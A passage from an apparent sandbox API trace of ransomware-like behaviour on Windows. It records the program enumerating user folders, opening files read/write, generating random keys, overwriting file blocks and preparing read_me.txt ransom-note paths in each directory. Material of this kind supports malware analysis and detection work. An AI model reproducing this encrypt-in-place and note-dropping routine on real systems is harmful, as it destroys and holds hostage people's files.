returned 1 [0076.907] SetFilePointerEx (in: hFile=0x804, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.907] WriteFile (in: hFile=0x804, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.907] WriteFile (in: hFile=0x804, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.908] GetProcessHeap () returned 0x280000 [0076.908] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0076.908] GetProcessHeap () returned 0x280000 [0076.908] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.908] GetProcessHeap () returned 0x280000 [0076.908] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.908] CloseHandle (hObject=0x804) returned 1 [0076.909] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 32 [0076.909] GetProcessHeap () returned 0x280000 [0076.909] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89d0048 [0076.909] wnsprintfW (in: pszDest=0x89d0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*") returned 64 [0076.909] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x16b7f5d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b7f5d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2478 [0076.909] wnsprintfW (in: pszDest=0x89d0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\.") returned 64 [0076.909] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x16b7f5d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b7f5d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0076.909] wnsprintfW (in: pszDest=0x89d0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\..") returned 65 [0076.909] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0076.909] wnsprintfW (in: pszDest=0x89d0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0076.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x808 [0076.994] QueueUserWorkItem (Function=0x404e00, Context=0x808, Flags=0x0) returned 1 [0076.994] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b7f5d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b7f5d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b7f5d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.994] wnsprintfW (in: pszDest=0x89d0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\read_me.txt") returned 74 [0076.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7fc [0076.994] GetProcessHeap () returned 0x280000 [0076.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b20008 [0076.994] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*") returned 55 [0076.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b7f5d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b7f5d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b7f5d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0076.994] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\read_me.txt") returned 65 [0076.995] GetProcessHeap () returned 0x280000 [0076.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b20008 | out: hHeap=0x280000) returned 1 [0076.995] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 57 [0076.995] GetProcessHeap () returned 0x280000 [0076.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a900a8 | out: hHeap=0x280000) returned 1 [0076.995] GetProcessHeap () returned 0x280000 [0076.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a900a8 [0076.995] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*") returned 59 [0076.995] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2478 [0076.995] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\.") returned 59 [0076.995] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0076.995] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\..") returned 60 [0076.995] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ba5730, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.995] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\read_me.txt") returned 69 [0076.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7fc [0076.996] QueueUserWorkItem (Function=0x404e00, Context=0x7fc, Flags=0x0) returned 1 [0076.996] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0076.996] FindClose (in: hFindFile=0x2b2478 | out: hFindFile=0x2b2478) returned 1 [0076.996] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\read_me.txt") returned 69 [0076.996] GetProcessHeap () returned 0x280000 [0076.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a900a8 | out: hHeap=0x280000) returned 1 [0076.996] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 58 [0076.996] GetProcessHeap () returned 0x280000 [0076.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a30078 | out: hHeap=0x280000) returned 1 [0076.996] GetProcessHeap () returned 0x280000 [0076.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0076.996] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*") returned 45 [0076.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2478 [0076.996] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\.") returned 45 [0076.996] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0076.996] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\..") returned 46 [0076.996] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.996] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0076.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f8 [0076.997] GetProcessHeap () returned 0x280000 [0076.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ad00c8 [0076.997] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 45 [0076.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16c3dcb0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16c3dcb0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2478 [0076.997] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\.") returned 45 [0076.997] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16c3dcb0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16c3dcb0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0076.997] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\..") returned 46 [0076.997] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.997] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0076.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f8 [0076.997] GetProcessHeap () returned 0x280000 [0076.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ad00c8 [0076.997] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*") returned 51 [0076.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2478 [0076.997] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\.") returned 51 [0076.997] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0076.997] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\..") returned 52 [0076.998] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.998] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0076.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f8 [0077.025] QueueUserWorkItem (Function=0x404e00, Context=0x7f8, Flags=0x0) returned 1 [0077.025] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0077.025] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0077.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e4 [0077.025] QueueUserWorkItem (Function=0x404e00, Context=0x7e4, Flags=0x0) returned 1 [0077.025] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="web slice gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0077.025] FindClose (in: hFindFile=0x2b2478 | out: hFindFile=0x2b2478) returned 1 [0077.025] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\read_me.txt") returned 61 [0077.025] GetProcessHeap () returned 0x280000 [0077.025] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ad00c8 | out: hHeap=0x280000) returned 1 [0077.025] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 62 [0077.025] GetProcessHeap () returned 0x280000 [0077.025] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a60090 | out: hHeap=0x280000) returned 1 [0077.025] SetFilePointerEx (in: hFile=0x810, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.026] ReadFile (in: hFile=0x810, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0077.026] SetFilePointerEx (in: hFile=0x810, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.026] GetProcessHeap () returned 0x280000 [0077.026] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0077.026] GetProcessHeap () returned 0x280000 [0077.026] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0077.026] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0077.026] GetProcessHeap () returned 0x280000 [0077.026] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0077.026] ReadFile (in: hFile=0x810, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.074] SetFilePointerEx (in: hFile=0x810, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.074] WriteFile (in: hFile=0x810, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] HeapFree (in: hHeap=0x280000, dwFlags=0x0, 